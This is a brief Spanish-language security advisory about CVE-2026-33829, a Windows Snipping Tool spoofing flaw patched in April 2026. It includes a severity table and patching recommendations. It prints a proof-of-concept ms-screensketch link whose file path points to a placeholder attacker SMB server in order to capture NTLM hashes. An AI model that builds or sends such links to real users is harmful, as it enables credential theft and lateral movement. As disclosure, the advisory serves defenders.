Microsoft corrigió una vulnerabilidad de suplantación de identidad (spoofing) de severidad moderada en la herramienta Windows Snipping Tool, identificada como CVE-2026-33829, la cual podría permitir a atacantes robar credenciales de usuario. Esta falla afecta el uso del protocolo SMB durante procesos de autenticación y fue solucionada en las actualizaciones de seguridad publicadas el 14 de abril de 2026. Aunque requiere interacción del usuario, su explotación es sencilla y puede derivar en exfiltración de hashes NTLM y movimiento lateral dentro de la red.
La explotación requiere mínima sofisticación técnica, ya que un atacante solo necesita alojar una URL maliciosa o una página HTML que invoque automáticamente el esquema vulnerable y persuadir al usuario para que acceda. El Proof of Concept (PoC) demuestra que el ataque puede ejecutarse mediante un único enlace especialmente diseñado:
ms-screensketch:edit?&filePath=\\<attacker-smb-server>\file.png&isTemporary=false&saved=true&sourc
CVE y severidad
| CVE ID | Fabricante | Producto | Severidad | CVSS Score |
|---|---|---|---|---|
| CVE-2026-33829 | Microsoft | Windows Snipping Tool | Moderada | 4.3 |
Productos afectados
Windows Snipping Tool en sistemas operativos Windows que utilicen el protocolo SMB autenticado.
Solución
Aplicar las actualizaciones de seguridad publicadas por Microsoft el 14 de abril de 2026.
Recomendaciones
Priorizar la instalación inmediata del parche para mitigar riesgos de robo de credenciales; verificar la correcta implementación y funcionamiento posterior a la actualización.